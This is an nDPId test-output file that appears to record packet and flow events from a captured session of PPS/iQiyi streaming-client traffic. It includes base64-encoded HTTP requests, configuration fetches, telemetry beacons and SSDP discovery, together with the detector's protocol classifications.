+00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1413,"source":"pps.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353191500,"flow_last_seen":1467353191500,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1467353191500,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50766,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00643{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1413,"source":"pps.pcap","alias":"nDPId-test","flow_id":90,"flow_packet_id":1,"flow_last_seen":1467353191500,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"thread_ts_msec":1467353191500,"pkt":"TF4M6gNlABxCjnAxCABFAAC4L9BAAIAGTZDAqHMI3xpqFMZOAFCUEYDiYZCIJlAYQTcJ9QAAR0VUIC9leHQvY29tbW9uL3Fpc3UyL21hc2ZsYWcuaW5pIEhUVFAvMS4xDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANClVzZXItQWdlbnQ6IG1hc2ZsYWdfcnVueHgNCkhvc3Q6IHN0YXRpYy5xaXlpLmNvbQ0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCg0K"} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1413,"source":"pps.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353191500,"flow_last_seen":1467353191500,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1467353191500,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50766,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"static.qiyi.com","url":"static.qiyi.com\/ext\/common\/qisu2\/masflag.ini","code":0,"content_type":"","user_agent":"masflag_runxx"}} +01040{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1414,"source":"pps.pcap","alias":"nDPId-test","flow_id":90,"flow_packet_id":2,"flow_last_seen":1467353191505,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":493,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":493,"pkt_l4_len":459,"thread_ts_msec":1467353191505,"pkt":"ABxCjnAxTF4M6gNlCABFAAHfpuJAADgGHVffGmoUwKhzCABQxk5hkIgmlBGBclAYAB+\/UwAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IFFXUw0KRGF0ZTogRnJpLCAwMSBKdWwgMjAxNiAwNjowNjozMSBHTVQNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24vb2N0ZXQtc3RyZWFtDQpDb250ZW50LUxlbmd0aDogOTgNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkV4cGlyZXM6IEZyaSwgMDEgSnVsIDIwMTYgMDY6MTI6MTAgR01UDQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTM2MDANCkFjY2Vzcy1Db250cm9sLUFsbG93LU9yaWdpbjogKg0KWC1DYWNoZTogSElUIGZyb20gMTAuMTIxLjMzLjk3DQpYLUNhY2hlOiBISVQgZnJvbSAyMjMuMjYuMTA2LjIwDQpBY2NlcHQtUmFuZ2VzOiBieXRlcw0KDQpbbWFzZmxhZ10NCnY9Mg0KcD00MA0KZT2xsb6pL8nPuqMNCmFwcD1maWRkbGVyLHdpcmVzaGFyayxIdHRwV2F0Y2gsSHR0cFdhdGNoIFN0dWRpbyxIdHRwQW5hbHl6ZXINCg=="} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1415,"source":"pps.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353191521,"flow_last_seen":1467353191521,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1467353191521,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50767,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00643{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1415,"source":"pps.pcap","alias":"nDPId-test","flow_id":91,"flow_packet_id":1,"flow_last_seen":1467353191521,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"thread_ts_msec":1467353191521,"pkt":"TF4M6gNlABxCjnAxCABFAAC4L9RAAIAGTYzAqHMI3xpqFMZPAFCekgJEnvl6klAYQTcvHQAAR0VUIC9leHQvY29tbW9uL3Fpc3UyL21hc2F1dG8uaW5pIEhUVFAvMS4xDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANClVzZXItQWdlbnQ6IG1hc2F1dG9fcnVueHgNCkhvc3Q6IHN0YXRpYy5xaXlpLmNvbQ0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCg0K"} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1415,"source":"pps.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353191521,"flow_last_seen":1467353191521,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1467353191521,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50767,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"static.qiyi.com","url":"static.qiyi.com\/ext\/common\/qisu2\/masauto.ini","code":0,"content_type":"","user_agent":"masauto_runxx"}} 
+01086{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1416,"source":"pps.pcap","alias":"nDPId-test","flow_id":91,"flow_packet_id":2,"flow_last_seen":1467353191524,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":526,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":526,"pkt_l4_len":492,"thread_ts_msec":1467353191524,"pkt":"ABxCjnAxTF4M6gNlCABFAAIAVHFAADgGb6ffGmoUwKhzCABQxk+e+XqSnpIC1FAYAB\/e1QAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IFFXUw0KRGF0ZTogRnJpLCAwMSBKdWwgMjAxNiAwNjowNjozMSBHTVQNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24vb2N0ZXQtc3RyZWFtDQpDb250ZW50LUxlbmd0aDogMTMwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpFeHBpcmVzOiBGcmksIDAxIEp1bCAyMDE2IDA2OjUwOjIzIEdNVA0KQ2FjaGUtQ29udHJvbDogbWF4LWFnZT0zNjAwDQpBY2Nlc3MtQ29udHJvbC1BbGxvdy1PcmlnaW46ICoNClgtQ2FjaGU6IEhJVCBmcm9tIDEwLjEyMS4zMy45Nw0KWC1DYWNoZTogSElUIGZyb20gMjIzLjI2LjEwNi4yMA0KQWNjZXB0LVJhbmdlczogYnl0ZXMNCg0KW21hc2F1dG9dDQp2PTENCnA9MQ0KZT2xsb6pL8nPuqMvuePW3S\/J7tvaDQpzPb2ty9Uv1eO9rS\/JvbarL7rTxM8NCmFwcD1maWRkbGVyLHdpcmVzaGFyayxIdHRwV2F0Y2gsSHR0cFdhdGNoIFN0dWRpbyxIdHRwQW5hbHl6ZXINCg=="} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1417,"source":"pps.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353191538,"flow_last_seen":1467353191538,"flow_idle_time":7560000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":210,"midstream":1,"thread_ts_msec":1467353191538,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"36.110.220.15","src_port":50765,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00734{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1417,"source":"pps.pcap","alias":"nDPId-test","flow_id":92,"flow_packet_id":1,"flow_last_seen":1467353191538,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":264,"pkt_l4_len":230,"thread_ts_msec":1467353191538,"pkt":"TF4M6gNlABxCjnAxCABFAAD6L9ZAAIAGlfnAqHMIJG7cD8ZNAFCivUMktEgQ8FAY\/\/DARAAAR0VUIC90bXBzdGF0cy5naWY\/bWV0aG9kPXFpdWJpdGVyJm9zPXdpbmRvd3MtNi4xLjc2MDFfc3AxJnV1aWQ9MzUwQzNGMUFDNzVENDBiYzkwRDYwMkRBNEU2N0E3MkQmc29mdHZlcnNpb249MS4wLjAuMSZzb3VyY2U9cHBzJnRhc2t0eXBlPWdldHRhc2tpbmZvIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBRSVlpQW5nZW50DQpIb3N0OiBtc2cudmlkZW8ucWl5aS5jb20NCg0K"} +00904{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1417,"source":"pps.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353191538,"flow_last_seen":1467353191538,"flow_idle_time":7560000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":210,"midstream":1,"thread_ts_msec":1467353191538,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"36.110.220.15","src_port":50765,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"msg.video.qiyi.com","url":"msg.video.qiyi.com\/tmpstats.gif?method=qiubiter&os=windows-6.1.7601_sp1&uuid=350C3F1AC75D40bc90D602DA4E67A72D&softversion=1.0.0.1&source=pps&tasktype=gettaskinfo","code":0,"content_type":"","user_agent":"QIYiAngent"}} 
+00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1418,"source":"pps.pcap","alias":"nDPId-test","flow_id":91,"flow_packet_id":3,"flow_last_seen":1467353191556,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353191556,"pkt":"TF4M6gNlABxCjnAxCABFAAC5L9hAAIAGTYfAqHMI3xpqFMZPAFCekgLUnvl8alAYQMHSJwAAR0VUIC9leHQvY29tbW9uL3Fpc3UyL21hc3JlY29tLmluaSBIVFRQLzEuMQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQpVc2VyLUFnZW50OiBtYXNhdXRvX3J1bnh4DQpIb3N0OiBzdGF0aWMucWl5aS5jb20NCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQoNCg=="} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1423,"source":"pps.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353191604,"flow_last_seen":1467353191604,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1467353191604,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50768,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00643{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1423,"source":"pps.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":1,"flow_last_seen":1467353191604,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"thread_ts_msec":1467353191604,"pkt":"TF4M6gNlABxCjnAxCABFAAC4L+lAAIAGTXjAqHMI3xpqE8ZQAFAEnujgm7SOJVAYQTfnOwAAR0VUIC9leHQvY29tbW9uL3Fpc3UyL21hc2Jsb2cuaW5pIEhUVFAvMS4xDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANClVzZXItQWdlbnQ6IG1hc2Jsb2dfcnVueHgNCkhvc3Q6IHN0YXRpYy5xaXlpLmNvbQ0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCg0K"} 
+00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1423,"source":"pps.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353191604,"flow_last_seen":1467353191604,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1467353191604,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50768,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"static.qiyi.com","url":"static.qiyi.com\/ext\/common\/qisu2\/masblog.ini","code":0,"content_type":"","user_agent":"masblog_runxx"}} +00648{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1424,"source":"pps.pcap","alias":"nDPId-test","flow_id":92,"flow_packet_id":2,"flow_last_seen":1467353191606,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353191606,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5GMJAAC4G\/04kbtwPwKhzCABQxk20SBDwor1D9lAYPLgN5wAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjMxIEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9naWYNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} 
+01085{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1426,"source":"pps.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":2,"flow_last_seen":1467353191608,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":526,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":526,"pkt_l4_len":492,"thread_ts_msec":1467353191608,"pkt":"ABxCjnAxTF4M6gNlCABFAAIApFFAADgGH8jfGmoTwKhzCABQxlCbtI4lBJ7pcFAYAB996wAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IFFXUw0KRGF0ZTogRnJpLCAwMSBKdWwgMjAxNiAwNjowNjozMSBHTVQNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24vb2N0ZXQtc3RyZWFtDQpDb250ZW50LUxlbmd0aDogMTMwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpFeHBpcmVzOiBGcmksIDAxIEp1bCAyMDE2IDA2OjE3OjQzIEdNVA0KQ2FjaGUtQ29udHJvbDogbWF4LWFnZT0zNjAwDQpBY2Nlc3MtQ29udHJvbC1BbGxvdy1PcmlnaW46ICoNClgtQ2FjaGU6IEhJVCBmcm9tIDEwLjEyMS4zMy45Nw0KWC1DYWNoZTogSElUIGZyb20gMjIzLjI2LjEwNi4xOQ0KQWNjZXB0LVJhbmdlczogYnl0ZXMNCg0KW21hc2Jsb2ddDQp2PTENCnA9MQ0KZT2xsb6pL8nPuqMvuePW3S\/J7tvaDQpzPb2ty9Uv1eO9rS\/JvbarL7rTxM8NCmFwcD1maWRkbGVyLHdpcmVzaGFyayxIdHRwV2F0Y2gsSHR0cFdhdGNoIFN0dWRpbyxIdHRwQW5hbHl6ZXINCg=="} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1427,"source":"pps.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353191688,"flow_last_seen":1467353191688,"flow_idle_time":7560000,"flow_min_l4_payload_len":550,"flow_max_l4_payload_len":550,"flow_tot_l4_payload_len":550,"flow_avg_l4_payload_len":550,"midstream":1,"thread_ts_msec":1467353191688,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.200.11","src_port":50769,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+01190{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1427,"source":"pps.pcap","alias":"nDPId-test","flow_id":94,"flow_packet_id":1,"flow_last_seen":1467353191688,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":604,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":604,"pkt_l4_len":570,"thread_ts_msec":1467353191688,"pkt":"TF4M6gNlABxCjnAxCABFAAJOL\/RAAIAGZxbAqHMIZePIC8ZRAFCkQ4vBOJoXClAY\/\/Dn4QAAR0VUIC9jY3MgSFRUUC8xLjENClVzZXItQWdlbnQ6IENvb2tpZUNsZWFyX3J1bnh4DQpIb3N0OiBhcGkuY3VwaWQuaXFpeWkuY29tDQpDb29raWU6IHBwc19jbGllbnRfdmVyMj01LjIuMTUuMjI0MDsgVDAwNDA0PTRlM2FlNDE1YTU4NDc0OGFjOWFhMzE2MjhmMzlkMWU4OyBfcHBzX2l2aT1WazQ5TVRZd05UQTFMYVcvcFBtaFJ6OC9QNlRhcEVlbXVEOC9wTSt3Wmo4dHBMV3gzemd3cGxvL3BHYW9jU1pXVUQweEpsWkRQVDgvUHo4K3BMV3gzemd3cGxvL3BHYW9jU1pXU2owdE1TWldVejFXSmxaRVBTWldWRnRCWFQweU1UYzFKbFpOUFNaV1ZqMDFMakl1TVRVdU1qSTBNQ1pXVlQxb2RIUndPaTh2ZDNkM0xtbHhhWGxwTG1OdmJTOTJYekU1Y25Kc2RuVjRiR2N1YUhSdGJBPT07IFFDMDA2PXU1NDl2cHoxMGw5ZmthdHVtNGFsdzRicDsgUUMwMDg9MTQ2NjY0NTgxNi4xNDY2NjQ1ODE2LjE0NjY2NDU4MTYuMTsgSG1fbHZ0XzUzYjczNzRhNjNjMzc0ODNlNWRkOTdkNzhkOWJiMzZlPTE0NjY2NDU4MTc7IFFDMDA1PWFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQoNCg=="} +00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1427,"source":"pps.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353191688,"flow_last_seen":1467353191688,"flow_idle_time":7560000,"flow_min_l4_payload_len":550,"flow_max_l4_payload_len":550,"flow_tot_l4_payload_len":550,"flow_avg_l4_payload_len":550,"midstream":1,"thread_ts_msec":1467353191688,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.200.11","src_port":50769,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"api.cupid.iqiyi.com","url":"api.cupid.iqiyi.com\/ccs","code":0,"content_type":"","user_agent":"CookieClear_runxx"}} 
+00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1428,"source":"pps.pcap","alias":"nDPId-test","flow_id":94,"flow_packet_id":2,"flow_last_seen":1467353191722,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":291,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":291,"pkt_l4_len":257,"thread_ts_msec":1467353191722,"pkt":"ABxCjnAxTF4M6gNlCABFAAEVyyVAAC8GHh5l48gLwKhzCABQxlE4mhcKpEON51AYPCgsNwAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjMxIEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2pzb247IGNoYXJzZXQ9dXRmLTgNCkNvbnRlbnQtTGVuZ3RoOiAxMQ0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXNzLUNvbnRyb2wtQWxsb3ctQ3JlZGVudGlhbHM6IHRydWUNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQoNCnsiciI6ZmFsc2V9"} 00619{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1430,"source":"pps.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":2,"flow_last_seen":1467353192820,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1467353192820,"pkt":"AQBef\/\/6SNIkYwreCABFAAChDkwAAAER9TTAqAUp7\/\/\/+sTGB2wAjdbrTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} 
00619{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1437,"source":"pps.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":3,"flow_last_seen":1467353193179,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1467353193179,"pkt":"AQBef\/\/6jHNut5ODCABFAAChAo0AAAERAQHAqAUc7\/\/\/+up3B2wAjbFHTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} 00619{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1440,"source":"pps.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":3,"flow_last_seen":1467353195822,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1467353195822,"pkt":"AQBef\/\/6SNIkYwreCABFAAChDk8AAAER9THAqAUp7\/\/\/+sTGB2wAjdbrTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1443,"source":"pps.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353195852,"flow_last_seen":1467353195852,"flow_idle_time":7440000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"thread_ts_msec":1467353195852,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50771,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-01643{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1443,"source":"pps.pcap","alias":"nDPId-test","flow_id":95,"flow_packet_id":1,"flow_last_seen":1467353195852,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":946,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":946,"pkt_l4_len":912,"thread_ts_msec":1467353195852,"pkt":"TF4M6gNlABxCjnAxCABFAAOkMjBAAIAGuBrAqHMIymwO7MZTAFDqT5aSVlCsgFAYQTeESwAAR0VUIC9jcDIuZ2lmP2E9NGUzYWU0MTVhNTg0NzQ4YWM5YWEzMTYyOGYzOWQxZTgmYWk9JmFzPTE6NDU6MjN8NDUmYXY9NC4xMC4wMDQmYj0xODA5MzIzMDEmYz0zMSZjdD01MDAwMDAwOTIzNDQ3JmQ9MjE3NSZkaT0mZHA9NzEwMDAwMDEmZT1jNDg4OWU2NGFkOWQ5ZWViOWZmNDM4OTEwODUwYzQ0MiZlYz0mZW09JmZpPSZnPTAmbD1NVEU0TGpFMk15NDRMamt3Jm1rPSZudz0mb2Q9NTAwMDAwMDg1NDkzNCZvaT0mcD1hJnBwPSZyYz0mcmQ9JnJpPSZzPTE0NjczNTMxOTUwNTQmc2g9JnNxPSZzdz0mdD1zcCZ1PTBfYWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mdj00Nzk1MzEwMDAmdnY9NS4yLjE1LjIyNDAmeD0meT1xY18xMDAwMDFfMTAwMTQwIEhUVFAvMS4xDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLUNODQpSZWZlcmVyOiBodHRwOi8vd3d3LmlxaXlpLmNvbS9jb21tb24vZmxhc2hwbGF5ZXIvMjAxNDA5MjQvTWFpblBsYXllcl81XzJfM19jM18yXzFfNi5zd2YNCnF5aWQ6IGFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQpxeXBpZDogXzIwMTINCnF5cGxhdGZvcm06IDAtMg0KeC1mbGFzaC12ZXJzaW9uOiAxMiwwLDAsNzANCkFjY2VwdDogKi8qDQpQcmFnbWE6IG5vLWNhY2hlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUgOC4wOyBXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNC4wOyBTTENDMjsgLk5FVCBDTFIgMi4wLjUwNzI3OyAuTkVUIENMUiAzLjUuMzA3Mjk7IC5ORVQgQ0xSIDMuMC4zMDcyOTsgTWVkaWEgQ2VudGVyIFBDIDYuMCkvUVktUGxheWVyLVdpbmRvd3MvMi4wLjEwMg0KSG9zdDogbXNnLjcxLmFtDQoNCg=="} 
-01296{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1443,"source":"pps.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353195852,"flow_last_seen":1467353195852,"flow_idle_time":7440000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"thread_ts_msec":1467353195852,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50771,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=&as=1:45:23|45&av=4.10.004&b=180932301&c=31&ct=5000000923447&d=2175&di=&dp=71000001&e=c4889e64ad9d9eeb9ff438910850c442&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=5000000854934&oi=&p=a&pp=&rc=&rd=&ri=&s=1467353195054&sh=&sq=&sw=&t=sp&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=479531000&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} 